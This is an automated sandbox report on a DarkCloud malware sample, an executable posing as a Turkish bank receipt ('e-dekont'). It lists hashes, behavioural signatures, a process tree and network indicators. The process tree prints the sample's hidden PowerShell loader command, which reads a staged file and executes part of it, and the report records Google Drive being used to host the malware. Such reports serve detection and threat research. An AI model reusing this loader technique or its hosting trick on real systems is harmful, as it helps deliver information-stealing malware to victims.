Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 07:54
Static task
static1
Behavioral task
behavioral1
Sample
e-dekont02.04.2025.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
Spastisk.ps1
Resource
win10v2004-20250314-en
General
-
Target
e-dekont02.04.2025.exe
-
Size
976KB
-
MD5
dc219b6f4c32a80c24f2e4e35f668bb4
-
SHA1
25db317d7619f446312723f21fbfafba482734f3
-
SHA256
8f08477a7d22a869fb074f6fd5a3d6fcb7a0f2c6edd1a98a15efa9d04b07acc6
-
SHA512
c31b12bc2c5807ec8c6abf534cc610234e318aed5eab585f29384b5b400f99b002fe73ed8703d882f5ebe676db6330a3af6fe307dd6897a57838062b645a38ca
-
SSDEEP
24576:BhFi0ERYgjc4gJ1mQbAGBGkkULtts9eCvJwC:Xw0vD1fA2GapSp/
Malware Config
Extracted
darkcloud
- email_from
- email_to
Signatures
-
Darkcloud family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2192 powershell.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 30 668 msiexec.exe 32 668 msiexec.exe 34 668 msiexec.exe 36 668 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 drive.google.com 30 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 668 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2192 powershell.exe 668 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e-dekont02.04.2025.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2192 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 2192 powershell.exe Token: SeIncreaseQuotaPrivilege 2192 powershell.exe Token: SeSecurityPrivilege 2192 powershell.exe Token: SeTakeOwnershipPrivilege 2192 powershell.exe Token: SeLoadDriverPrivilege 2192 powershell.exe Token: SeSystemProfilePrivilege 2192 powershell.exe Token: SeSystemtimePrivilege 2192 powershell.exe Token: SeProfSingleProcessPrivilege 2192 powershell.exe Token: SeIncBasePriorityPrivilege 2192 powershell.exe Token: SeCreatePagefilePrivilege 2192 powershell.exe Token: SeBackupPrivilege 2192 powershell.exe Token: SeRestorePrivilege 2192 powershell.exe Token: SeShutdownPrivilege 2192 powershell.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeSystemEnvironmentPrivilege 2192 powershell.exe Token: SeRemoteShutdownPrivilege 2192 powershell.exe Token: SeUndockPrivilege 2192 powershell.exe Token: SeManageVolumePrivilege 2192 powershell.exe Token: 33 2192 powershell.exe Token: 34 2192 powershell.exe Token: 35 2192 powershell.exe Token: 36 2192 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 668 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2404 wrote to memory of 2192 2404 e-dekont02.04.2025.exe 89 PID 2404 wrote to memory of 2192 2404 e-dekont02.04.2025.exe 89 PID 2404 wrote to memory of 2192 2404 e-dekont02.04.2025.exe 89 PID 2192 wrote to memory of 668 2192 powershell.exe 98 PID 2192 wrote to memory of 668 2192 powershell.exe 98 PID 2192 wrote to memory of 668 2192 powershell.exe 98 PID 2192 wrote to memory of 668 2192 powershell.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\e-dekont02.04.2025.exe"C:\Users\Admin\AppData\Local\Temp\e-dekont02.04.2025.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Algine=GC -raw 'C:\Users\Admin\AppData\Roaming\plankevrket\petunia\Spastisk.Mon';$Superintenseness=$Algine.SubString(20554,3);.$Superintenseness($Algine)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:668
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
54KB
MD50dd6bde75f23f98b72d3aa40fa3b61e8
SHA1c148b04d809c5d9e39b13f50356d7d41abe81f20
SHA25602e687ed7dc28b91cc89eb4189edf3554d953ea674950a6a62a80fac38c6ffe9
SHA512a7da969581dc282dbfcaaa45b70ebadfe53b1a458bf07458f9a509fe25866e6b84af7cdde3b8e67a89b9159774559c11bd9735c6f57af176466ead337f149809
-
Filesize
402KB
MD560b40597c4e893a4c8bf0ee39bea6c69
SHA14d23e72cf8ff7d3801d5f57b7c2b7522a8544b40
SHA256d9e82ec7b23022401a633c5cab35855b82ce88fd5f2fe64ffb063a030e0b7fb1
SHA51224b9c4e80ea6ed89d1392809e15764e1315edfaedb38139a4005d54437663860566ed3eee74a968eec435d21d87f6a8d7681f83fc121ccb28b650a0132c06845